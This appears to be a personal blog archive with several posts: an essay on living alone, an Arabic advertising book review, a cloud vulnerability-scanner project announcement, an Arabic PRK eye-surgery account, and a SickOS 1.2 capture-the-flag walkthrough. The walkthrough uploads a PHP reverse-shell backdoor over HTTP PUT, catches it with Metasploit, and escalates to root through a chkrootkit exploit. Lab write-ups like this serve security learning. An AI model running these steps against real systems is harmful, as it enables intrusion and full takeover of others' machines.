Uncategorized

Advantage and Disadvantage of Living alone

Living alone is the life style that a person can live inside the home without family. Living alone has an advantage and disadvantage as well.

One of the advantages regarding living alone is taking full responsibility for your life and housekeeping too and take care of a job or study more than living with family and interruptions live.

To mention the disadvantage of living alone is to minimize social activities, talking to others and solving problems from what family have and that causes to generate a bad feeling such as overthinking.

Both living alone or with parents have positive and negative effects, and it depends on the person case, some of people like to live alone nearby job or university benefit and to focus more on their job and study as well. Not to mention that living with parents has benefits like taking caring of the person while he is in a sick mod or cooking males during work time.
If a person lives alone so he has to do all housekeeping and cooking foods without taking family helping.

Overthinking is to think deeply for basic behaviour with people comes to your mind. This often comes to people who lived alone for a long time not to mention that less of speaking to people and exchange daily routine activities with family.

In my view, I like to live alone if I have some big goal to achieve in a better way, living alone makes me focus more of study and working for long hours without interrupting from parents. It also makes me own my all-time and control it as I hope.
Abdulghani Alkhateeb

Uncategorized

السوشل ميديا في الإعلان الجديد

على مر السنتين الماضيتين، كنت أنزعج من الإشعارات وتطورت إلى جميع الإعلانات المقاطعة باليوتيوب والانترنت.
فاستخدمت عدة تقنيات لمكافحتها حتى اشتريت رخصة مدى الحياة لإحدى خدمات الحجب الكامل للإعلانات وصرت مزود للخدمة أيضا ✌️

بس بعد ما قرأت هذا الكتاب صرت استمتع بمشاهدة كل إعلان وكيف استخدم منتج الإعلان #القصة لتوصيل الرسالة.

الإعلان الجديد لا يطلب من المستهلك الشراء فوراً وإنما يصوّر له قصة.. ويشرح له مدى حاجته لمنتجه في حياته اليومية.

متل يلي دايما بصور الولد الصغير يخرج فيتسخ بالتراب والطين ويأتي منتج الغسيل #فيريال ليقضي على الجراثيم ويجعل بقية الحياة سعيدة وبيضاء ✋

الكتاب جميل ولكن يوجد له بعض السلبيات كتحليل الإعلانات الطويل والخروج عن الموضوع بشرح الفكرة وأخطاء إنتاجية بجزء من الكتاب.


#منصات_التواصل_الاجتماعي

Uncategorized

Mini SOC Project

I’m glad to announce my Graduation Project in Applied Science Private University is done!

and It will go live very soon!

#MiniSOC is a Cloud Solution for vulnerability assessment where you can scan your website, Or any connected device on the internet! , integrated with the latest technology on cloud computing.

#AWS #cloudflare #soc

#cybersecurity #pentest #vulnerability

#vulnerabilityassessment #securityautomation #security

miniSOC.png

 

Uncategorized

عملية تصحيح النظر P.R.K

prk.jpg

بالبداية للتوضيح يوجد عدة عمليات للتصحيح بين الليرز والليزك والفيمتو ليزك أما شرح عمليتنا هي P.R.K

عملية مطورة عن الليزك، لا يوجد أفضل وإنما اختلاف تقنيات لعلاج القرنية

محتوى المدونة عن تجربتي الشخصية وليس مرجع طبي معتمد

 عملية (P.R.K)

Photorefractive Keratectomy

وهي عبارة عن اقتصاص طبقة من القرنية ليعود تحدبها لوضعه الطبيعي وبذلك تتصحح الرؤية

نتيجة بحث الصور عن ‪prk‬‏

بالمرحلة الأولى تخدير العين

المرحلة الثانية قص طبقة علوية من القرنية باستخدام الليزر عن طريق جهاز بدون إحساس بالألم

المرحلة الثالثة يقوم الطبيب بإزالة الطبقة القديمة من القرنية

المرحلة الرابعة إضافة عدسة شفافة مؤقتة لمدة 3 أيام حتى تلتئم القرنية ولحماية منطقة الجرح

قبل العملية تأكد من قياس عمق القرنية وأنها تسمح لإجرائها

      تزداد خطورة حدوث إزاحة بالقرنية ولا يمكن إجراء العملية (300  – 270)

ومن المفترض أن يكون العمق 300 فأكثر وبالتأكيد هذا باستشارة الطبيب

فيما يلي صورة لرؤية المريض قبل وبعد العملية

PRK.png

من اليسار قبل إجراء العملية وبدون لبس النظارات

في الوسط بعد العملية من يوم إلى ثلاثة أيام تشعر بوجود ماء بينك وبين الرؤية

في اليمين تتحسن الرؤية وتصبح بهذا الشكل من فترة أسبوع حتى ثلاثة أسابيع

يعود النظر الطبيعي بشكل تدريجي من أسبوع حتى شهر

الأسبوع الأول %25

الأسبوع الثاني %50

الأسبوع الثالث %80

الأسبوع الرابع %100

العملية تستغرق 10 دقائق لكلا العينين

بعد إجراء العملية قد لا تستطيع رؤية الإضاءات الناصعة بما في ذلك الشمس وشاشة الهاتف والتلفاز

ستشعر بالرغبة بعرك العينين ولكن حك العينين ممنوع حتى إزالة العدسات

ينصح بأخذ استحمام قبل الذهاب للمستشفى فلن تستطيع غسل عينيك قبل أسبوع بعد إجراء العملية

ولأنك ستكره الإضاءات ستضع نظارات شمسية تقي من الإضاءة والغبار ليومين بعد العملية

c69e375c-e9d9-4c97-b87b-5a9a77528083-588-00000034af798fe3_file

ستأخذ ثلاث أنواع من قطرات العيون (مضاد حيوي – مرطب – قطرة لتصفية الرؤية)

!إذا كان الحاسب الآلي يتضمن عملك اليومي أو الدراسي فتكبير الشاشة 200% سيكون حلاً رائعاً لترى بوضوح

نصيحة أخيرة، أنا كنت قد شاهدت العملية قبل دخولي عبر حساب سناب شات الطبيب فلا أنصحك بهذا

قد تشعر بوهم الألم قبل دخولك للعملية وفي الواقع وأثناء العملية ستكون تحت تأثير المخدر ولن تشعر بآلام

 

شرح لطريقة العملية

مراجع:

https://www.katzeneye.com/what-is-prk/

https://www.allaboutvision.com/visionsurgery/prk.htm

 

Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
Netdiscover 
IP: 192.168.236.136
It may different in your lab,
1.png
Scan the IP target with nmap as default:
nmap -A -vv -T4  192.168.236.136
2.png
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports
  • Type the IP in target: 192.168.236.136
  • Choose from profile:Intense scan plus UDP
4
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
    nikto -h 192.168.236.136
5.png
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
  • Type http://192.168.236.136in the target textfiled.
  • Check Go Faster for speed process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
6.png
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
#curl -v -X OPTIONS http://192.168.236.136/test
7.png
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
    locate shell
8.png
Copy shell and rename it as shell.php
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
    nano shell.php
9.png
$ip=’192.168.236.135′ 
    >> kali IP
$port 443 
    >> because 4444 isn’t working
nmap -p 80 192.168.236.136 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
10.png
Successfully created!
Now we have to make listener, in two different way nc -lvp 443 or  metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php  because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
msfconsole
use exploit/multi/handler
set payload php/reverse_php
set LHOST192.168.236.136
set LPORT 442
exploit -jz
11.png
Final options:
12.png
Then we move to this shell via browser:
13.png
Finally we got a user shell!
But with normal user www-data
14.png
For Privilege Escalation first we check the current process running and has root privileges:
ls -la
15.png
We saw that linechkrootkit has root privileges,
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476 this could allow me to escalate my privilge.
with metasploit module.
  • use exploit/unix/local/chkrootkit
  • set session 1
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
16.png
Type
>Info
17.png
Make sure about lport with options command:
18.png
Then type run
19.png
session 4 opened ! in my case,
Type id 
To see the privilege account
20.png
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
I Hope you enjoy it!
contact me twitter: